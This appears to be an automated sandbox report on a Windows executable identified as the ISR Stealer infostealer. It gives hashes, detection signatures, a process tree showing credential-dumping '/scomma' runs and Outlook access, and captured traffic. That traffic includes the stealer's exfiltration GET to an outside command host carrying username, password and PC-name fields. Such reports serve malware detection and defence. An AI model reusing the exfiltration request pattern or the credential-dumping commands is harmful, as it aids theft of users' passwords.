Analysis

  • max time kernel
    49s
  • max time network
    115s
  • platform
    windows7_x64
  • resource
    win7-20220901-en
  • resource tags

    arch:x64arch:x86image:win7-20220901-enlocale:en-usos:windows7-x64system
  • submitted
    21-11-2022 23:29

General

  • Target

    20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe

  • Size

    1013KB

  • MD5

    729d6040af9af63c748491a3f0b597fb

  • SHA1

    f8b7ac08d14581cc35770a34ba49aa273b6ff659

  • SHA256

    20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6

  • SHA512

    b5c9ddf44e268d7bd4cc690ef83e5c4ffdbb2ba90a391a73373ba48735a608747581d84c365bf644d3a2a38a6280ae93c376779822dc83fbab496f80700acb09

  • SSDEEP

    12288:RaWzgMg7v3qnCiMErQohh0F4CCJ8lny/QQOJZri9oGE15jSsFZyoopMXnyTWn:AaHMv6Corjqny/QJJtkoRNFZyoRnyin

Malware Config

Signatures

  • ISR Stealer

    ISR Stealer is a modified version of Hackhound Stealer written in visual basic.

  • ISR Stealer payload 6 IoCs
  • NirSoft MailPassView 2 IoCs

    Password recovery tool for various email clients

  • Nirsoft 2 IoCs
  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies system certificate store 2 TTPs 3 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 3 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 25 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
    "C:\Users\Admin\AppData\Local\Temp\20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe"
    1⤵
    • Suspicious use of SetThreadContext
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:2032
    • C:\Users\Admin\AppData\Local\Temp\20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      "C:\Users\Admin\AppData\Local\Temp\20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies system certificate store
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:940
      • C:\Users\Admin\AppData\Local\Temp\20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
        /scomma "C:\Users\Admin\AppData\Local\Temp\A8MpcatkW3.ini"
        3⤵
          PID:1124
        • C:\Users\Admin\AppData\Local\Temp\20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
          /scomma "C:\Users\Admin\AppData\Local\Temp\lO0cajvQoQ.ini"
          3⤵
          • Accesses Microsoft Outlook accounts
          PID:1092

    Network

    • flag-unknown
      DNS
      prince.comxa.com
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      Remote address:
      8.8.8.8:53
      Request
      prince.comxa.com
      IN A
      Response
      prince.comxa.com
      IN A
      153.92.0.100
    • flag-unknown
      GET
      http://prince.comxa.com/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename=
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      Remote address:
      153.92.0.100:80
      Request
      GET /index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename= HTTP/1.1
      User-Agent: HardCore Software For : Public
      Host: prince.comxa.com
      Response
      HTTP/1.1 301 Moved Permanently
      Server: nginx
      Date: Mon, 21 Nov 2022 23:29:37 GMT
      Content-Type: text/html
      Content-Length: 162
      Connection: keep-alive
      Location: https://www.000webhost.com/migrate?static=true
      X-Frame-Options: sameorigin
      X-Content-Type-Options: nosniff
      X-XSS-Protection: 1; mode=block
    • flag-unknown
      DNS
      www.000webhost.com
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      Remote address:
      8.8.8.8:53
      Request
      www.000webhost.com
      IN A
      Response
      www.000webhost.com
      IN A
      104.19.185.120
      www.000webhost.com
      IN A
      104.19.184.120
    • flag-unknown
      GET
      https://www.000webhost.com/migrate?static=true
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      Remote address:
      104.19.185.120:443
      Request
      GET /migrate?static=true HTTP/1.1
      User-Agent: HardCore Software For : Public
      Host: www.000webhost.com
      Connection: Keep-Alive
      Response
      HTTP/1.1 403 Forbidden
      Date: Mon, 21 Nov 2022 23:29:38 GMT
      Content-Type: text/plain; charset=UTF-8
      Content-Length: 16
      Connection: keep-alive
      X-Frame-Options: SAMEORIGIN
      Referrer-Policy: same-origin
      Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
      Expires: Thu, 01 Jan 1970 00:00:01 GMT
      Server: cloudflare
      CF-RAY: 76dd3567bbb0b8de-AMS
      alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
    • 153.92.0.100:80
      http://prince.comxa.com/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename=
      http
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      439 B
      1.2kB
      6
      5

      HTTP Request

      GET http://prince.comxa.com/index.php?action=add&username=&password=&app=&pcname=RYNKSFQE&sitename=

      HTTP Response

      301
    • 104.19.185.120:443
      https://www.000webhost.com/migrate?static=true
      tls, http
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      960 B
      6.6kB
      10
      10

      HTTP Request

      GET https://www.000webhost.com/migrate?static=true

      HTTP Response

      403
    • 8.8.8.8:53
      prince.comxa.com
      dns
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      62 B
      78 B
      1
      1

      DNS Request

      prince.comxa.com

      DNS Response

      153.92.0.100

    • 8.8.8.8:53
      www.000webhost.com
      dns
      20f64afe66e77dbfea66194478ed94c27ddae050fbdd0344900bedc027846cb6.exe
      64 B
      96 B
      1
      1

      DNS Request

      www.000webhost.com

      DNS Response

      104.19.185.120
      104.19.184.120

    MITRE ATT&CK Enterprise v6

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Temp\A8MpcatkW3.ini

      Filesize

      5B

      MD5

      d1ea279fb5559c020a1b4137dc4de237

      SHA1

      db6f8988af46b56216a6f0daf95ab8c9bdb57400

      SHA256

      fcdcc2c46896915a1c695d6231f0fee336a668531b7a3da46178c80362546dba

      SHA512

      720e9c284f0559015312df7fe977563e5e16f48d3506e51eb4016adf7971924d352f740b030aa3adc81b6f65fd1dba12df06d10fa6c115074e5097e7ee0f08b3

    • memory/940-71-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/940-55-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/940-56-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/940-58-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/940-60-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/940-61-0x0000000000401180-mapping.dmp

    • memory/940-84-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/940-83-0x0000000000400000-0x0000000000442000-memory.dmp

      Filesize

      264KB

    • memory/1092-77-0x000000000041C410-mapping.dmp

    • memory/1092-76-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/1092-80-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/1092-81-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/1092-82-0x0000000000400000-0x000000000041F000-memory.dmp

      Filesize

      124KB

    • memory/1124-72-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1124-70-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1124-73-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1124-69-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/1124-66-0x00000000004512E0-mapping.dmp

    • memory/1124-65-0x0000000000400000-0x0000000000453000-memory.dmp

      Filesize

      332KB

    • memory/2032-54-0x00000000766D1000-0x00000000766D3000-memory.dmp

      Filesize

      8KB

    We care about your privacy.

    This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.